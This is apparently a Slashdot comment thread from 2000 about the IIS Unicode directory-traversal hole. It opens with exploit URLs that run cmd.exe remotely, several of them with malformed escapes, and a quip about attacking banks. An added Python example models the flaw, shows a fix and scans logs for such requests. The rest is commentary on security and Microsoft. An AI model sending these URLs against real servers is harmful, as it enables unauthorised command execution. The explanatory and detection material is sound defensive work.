    http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
    http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
    http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
    http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir

    Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
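    The URLs in the comment above rely on IIS checking a request path for traversal before it decoded overlong UTF-8 sequences such as %c0%af, which a lenient decoder then turned into a path separator. The following is an added example, not code from this thread, from the poster, or from Microsoft: a small model of that check-then-decode ordering beside a hardened version that decodes strictly first, plus a scanner that flags such requests in IIS-style log lines. The virtual root `/scripts`, all function names, and the four log lines are constructed for illustration, and the lenient decoder models only the two-byte overlong forms (%c0%af and %c1%9c), not every sequence in the posted list.

```python
"""Model of the IIS Unicode traversal (added example; nothing here is IIS code).

Flaw modelled: the traversal check runs on the raw request path, where
'..\xc0\xaf..' looks like one oddly named directory that the following '..'
cancels, so the path appears to stay inside the virtual root. A lenient UTF-8
decoder then turns that segment into '../..' and the resolved path escapes.
"""

import posixpath
from urllib.parse import unquote_to_bytes

VROOT = "/scripts"  # assumed virtual root of the executable directory


def lenient_utf8(data: bytes) -> str:
    """Decoder that accepts overlong two-byte UTF-8 forms (an assumption).

    A strict decoder rejects lead bytes 0xC0/0xC1; this one folds them, so
    %c0%af becomes '/' and %c1%9c becomes '\\'. Only two-byte forms are modelled.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def escapes_vroot(path: str) -> bool:
    """True if the canonicalized path leaves VROOT (backslashes count as separators)."""
    norm = posixpath.normpath(path.replace("\\", "/"))
    return not (norm == VROOT or norm.startswith(VROOT + "/"))


def _stem(url: str) -> str:
    return url.split("?", 1)[0]  # drop the '?/c+dir' query part


def vulnerable_resolve(url: str) -> str:
    """Check first, decode second: the ordering the posted URLs exploited."""
    raw = unquote_to_bytes(_stem(url))
    # BUG: the check sees the overlong bytes as ordinary name characters.
    if escapes_vroot(raw.decode("latin-1")):
        raise PermissionError("traversal rejected")
    # The lenient decode now turns '..\xc0\xaf..' into '../..'.
    return posixpath.normpath(lenient_utf8(raw).replace("\\", "/"))


def hardened_resolve(url: str) -> str:
    """Decode strictly, canonicalize, then check; overlong forms never get in."""
    raw = unquote_to_bytes(_stem(url))
    decoded = raw.decode("utf-8")  # %c0%af -> UnicodeDecodeError
    norm = posixpath.normpath(decoded.replace("\\", "/"))
    if escapes_vroot(norm):
        raise PermissionError("traversal rejected")
    return norm


def traversal_after_decode(uri_stem: str) -> bool:
    """Detection: would a lenient decoder leave a '..' segment in this path?"""
    decoded = lenient_utf8(unquote_to_bytes(uri_stem)).replace("\\", "/")
    return ".." in decoded.split("/")


# Constructed W3C-style log lines: date time c-ip method uri-stem query status
SAMPLE_LOG = """\
2000-11-05 10:47:12 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2000-11-05 10:47:40 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2000-11-05 10:48:03 10.0.0.9 GET /scripts/lookup.asp id=4 200
2000-11-05 10:48:15 10.0.0.7 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
"""


def scan_log(text: str) -> list:
    """Return (client-ip, uri-stem) for every request that decodes to a traversal."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[3] not in ("GET", "POST", "HEAD"):
            continue
        if traversal_after_decode(fields[4]):
            hits.append((fields[2], fields[4]))
    return hits


if __name__ == "__main__":
    url = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"
    print("vulnerable ->", vulnerable_resolve(url))
    try:
        hardened_resolve(url)
    except UnicodeDecodeError:
        print("hardened   -> rejected overlong UTF-8")
    for ip, stem in scan_log(SAMPLE_LOG):
        print("flagged", ip, stem)
```

    The point of the two resolvers is the ordering, not the decoder itself: any check performed on a representation that is decoded again afterwards can be bypassed by whatever the later decode accepts. The log scanner deliberately applies the same lenient decode before looking for a `..` segment, so it catches the encoded variants as well as the plain `../../` attempt that a patched server would simply refuse.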
  • by roman_mir ( 125474 ) on Sunday November 05, 2000 @03:01PM (#647711) Homepage Journal
    Steve Mann, who is a prof at UofT (Toronto) and teaches hardware engineering and wearable computers, noted that any MS Windows is a toy operating system. The guy only deals with Unix though.
  • All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.

    That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get privilege, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.

  • He is eager to throw money as ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes.

    BillG has made most of his money from ripping off large, wealthy Western companies and large, wealthy Westerners. While ripping people off is always unethical, the cynical side of me says that if a large proportion of Bill Gates' wealth earned, by and large, from rich people, ends up going to people who really need it, that goes some way to squaring the ledger :)

  • by e_n_d_o ( 150968 ) on Sunday November 05, 2000 @04:14PM (#647718)
    I tried this exploit against one of MY OWN MACHINES. As in, a machine that is owned by me, on which I already know the Admin password etc.

    The first thing I tried was the cmd.exe /c dir command like x-empt suggested, and the result was as expected.

    Then I pcAnywhere'd in and decided to see whether notepad would appear on the display if I launched it remotely. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except Task Manager. Can't even launch the services panel to kill IIS.

    So now I'm attempting the tried and true method of fixing a win box.
  • ...is at risk of being cracked.

    Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.

    Congratulations. You're now at risk of being cracked.

    All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.

    You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.

    --Remove SPAM from my address to mail me
  • by mangu ( 126918 ) on Sunday November 05, 2000 @11:04AM (#647724)
    Following a simple analogy to your reasoning, if no car manufacturer ever publishes their design details, how do criminals find out how to start the engine without the key? Simply put, it takes an engineer to design something, but any punk can find out a way to break things.

    You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intricacies of software they would not be script-kiddies.

    Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.

  • Let me tell you one thing, debugging is hard work. If it was just a matter of "knowing some C and getting lucky" we wouldn't need so many tools to do the job.

    On the other hand, you don't need to pinpoint a weakness in the source code to break software; you just overload it and see how it reacts. A chain is as weak as its weakest link: pull it with enough force and it will break.

    Determining the exact point of the failure is a work for the programmers who wrote the code, the crackers don't need to do that.

  • by Bender Unit 22 ( 216955 ) on Sunday November 05, 2000 @09:41AM (#647739) Journal
    We all know that most people here on /. enjoy a good M$ bashing when they get the chance. Sometimes the subject is a bit questionable and not really good material for it. But if the article is correct, then they have really asked for it this time.
    Now for mine. A company that size, with so many users depending on them, has a huge responsibility in keeping this from happening. When it happened the first time, they should have had the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual; can we go past 500. :-)
    [extreme bashing on]If they can't secure their own network based on their own products, who can?[extreme bashing off]. ah felt good. :-)
    But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
  • by Anonymous Coward on Sunday November 05, 2000 @09:44AM (#647741)
    I haxored kernel.org and downloaded the linux source code
  • by Anonymous Coward on Sunday November 05, 2000 @09:45AM (#647742)
    I love it, I absolutely love it. Sys admins are always being told that it's their fault for being hacked because they hadn't kept up on the latest patches. Now MS is whining and complaining that it's too hard to apply all those patches to all those servers. The message I'm getting is this:

    1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.

    Did I miss anything?

  • > Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.

    Naw, just remember the old Zen koan:

    ``If you meet the Buddha on the road, KILL HIM!"

    (Note to the humor impaired & windows-lovers out there: yes, I *am* making a joke.)


  • > Call it embarrassment, call it publicity, but please don't call it unadulterated altruism.

    Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.

    Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved," I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?

    So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.

